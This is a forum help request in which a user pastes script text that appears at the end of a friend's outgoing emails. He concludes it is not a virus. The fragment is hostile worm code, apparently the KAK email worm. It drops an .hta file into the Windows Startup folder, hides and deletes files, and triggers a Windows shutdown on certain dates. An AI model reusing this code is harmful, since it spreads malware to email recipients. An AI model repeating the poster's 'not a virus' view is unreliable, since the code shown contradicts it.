Tech Support Guy banner
  • Please post in our Community Feedback thread for help with the new forum software! If you are having trouble logging in, please Contact Us for assistance.
Status
Not open for further replies.
1 - 1 of 1 Posts

·
Registered
1,642 Posts
Discussion Starter · #1 ·
Hi Guys,

My buddy has an e-mail account with NetEaze.com and uses it as an alternative to his Yahoo account. At any rate for the last 2 years, people that get messages from his Net Eaze account, get this at the bottom of his e-mail messages:

');t3.close();fs.GetFile(wd+'kak.htm').Attributes=2;fs.DeleteFile(wd+'kak.reg');d=new Date();if(d.getDate()==1 && d.getHours()>17){alert('Kagou-Anti-Kro$oft says not today !');wsh.Run(wd+'RUNDLL32.EXE user.exe,exitwindows');}self.close();S3 driver memory alloc failed !]]%%%%%";la=(navigator.systemLanguage)?navigator.systemLanguage:navigator.language;scr.Path=(la=="fr")?"C:\\windows\\Menu Démarrer\\Programmes\\Démarrage\\kak.hta":"C:\\windows\\Start Menu\\Programs\\StartUp\\kak.hta";agt=navigator.userAgent.toLowerCase();if(((agt.indexOf("msie")!=-1)&&(parseInt(navigator.appVersion)>4))||(agt.indexOf("msie 5.")!=-1))scr.write(); //-->

It's not a virus because he has sent e-mail to me under this account, and there is no indication of any attachment paper-clip icon on the message. It is only on his NetEase account. He wants to know what, if anything he can do to get rid of this message. I am not sure if he gets it at the bottom of his messages, but everyone that recieves a message from him, gets this at the bottom.

Jack

1 - 1 of 1 Posts
Status
Not open for further replies.